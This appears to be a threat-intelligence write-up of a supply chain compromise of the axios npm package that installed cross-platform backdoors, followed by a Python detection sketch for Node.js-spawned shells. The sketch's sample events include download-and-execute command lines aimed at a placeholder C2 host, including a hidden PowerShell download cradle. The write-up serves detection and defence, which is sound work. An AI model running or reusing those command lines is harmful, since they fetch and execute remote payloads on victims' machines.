
Detections for the Axios supply chain compromise

· Published 07/04/2026 11:10 · Modified 07/04/2026 11:26


Essential information

Tags: 2026-04-07, axios, post-install execution, supply chain attack
Related entities: 9 observables, 18 techniques (MITRE), 4 malware, 3 others

Description

A supply chain compromise targeting axios npm package versions 1.14.1 and 0.30.4 introduced a malicious transitive dependency ([email protected]) that executed during installation. The attack deploys cross-platform payloads for Linux, Windows, and macOS through a consistent pattern: Node.js spawns OS-native shells that retrieve and execute remote payloads in detached or hidden contexts. Linux victims receive a Python-based RAT, Windows systems get a PowerShell backdoor with registry persistence, and macOS hosts are compromised with a Mach-O binary backdoor. All variants beacon to the same C2 infrastructure and perform host fingerprinting, process enumeration, filesystem reconnaissance, and arbitrary code execution. The malicious activity is reliably detected through behavioral signatures that focus on unusual Node.js process ancestry and remote payload retrieval rather than on static indicators.
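A sketch of the process-ancestry detection the description refers to, written as an added example for this page rather than a rule taken from the report: it flags a shell spawned by Node.js whose command line retrieves a remote payload or runs in a hidden or detached context. The process events and the C2_PLACEHOLDER host are constructed, not indicators from the page.

```python
import re

# Constructed sample process-creation events (not from the report). A
# sensor would normally emit these as parent/child pairs with command lines.
EVENTS = [
    {"id": 1, "parent": "node", "image": "sh",
     "cmdline": "sh -c 'curl -fsSL http://C2_PLACEHOLDER/p.py -o /tmp/p.py "
                "&& nohup python3 /tmp/p.py &'"},
    {"id": 2, "parent": "node.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -c IEX (New-Object "
                "Net.WebClient).DownloadString('http://C2_PLACEHOLDER/x')"},
    {"id": 3, "parent": "node", "image": "bash",
     "cmdline": "bash -c 'cd /tmp && curl -s http://C2_PLACEHOLDER/m -o m "
                "&& chmod +x m && ./m'"},
    {"id": 4, "parent": "node", "image": "sh",
     "cmdline": "sh -c 'node-gyp rebuild'"},  # benign native build step
    {"id": 5, "parent": "bash", "image": "curl",
     "cmdline": "curl -fsSL https://registry.npmjs.org/axios"},  # not spawned by node
]

NODE_IMAGES = {"node", "node.exe", "nodejs"}
SHELL_IMAGES = {"sh", "bash", "zsh", "dash", "cmd.exe",
                "powershell.exe", "pwsh", "pwsh.exe"}
# Command-line markers of remote retrieval and of hidden/detached execution.
REMOTE_FETCH = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|DownloadString|DownloadFile|Net\.WebClient)\b",
    re.I)
HIDDEN_OR_DETACHED = re.compile(
    r"-WindowStyle\s+Hidden|-w\s+hidden|\bnohup\b|\bsetsid\b|\bstart\s+/b\b", re.I)

def classify(event):
    """Return the detection reasons for one event (empty list means no match)."""
    if (event["parent"].lower() not in NODE_IMAGES
            or event["image"].lower() not in SHELL_IMAGES):
        return []  # ancestry filter: only shells whose parent is Node.js
    reasons = []
    if REMOTE_FETCH.search(event["cmdline"]):
        reasons.append("node->shell with remote payload retrieval")
    if HIDDEN_OR_DETACHED.search(event["cmdline"]):
        reasons.append("node->shell in hidden/detached context")
    return reasons

def detect(events):
    """Map event id -> reasons for every event matching at least one signature."""
    return {e["id"]: classify(e) for e in events if classify(e)}
```

Events 1 to 3 are flagged while the native build step and the fetch not parented by Node.js are not; in production the same logic would run over EDR process telemetry rather than an inline list.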

External references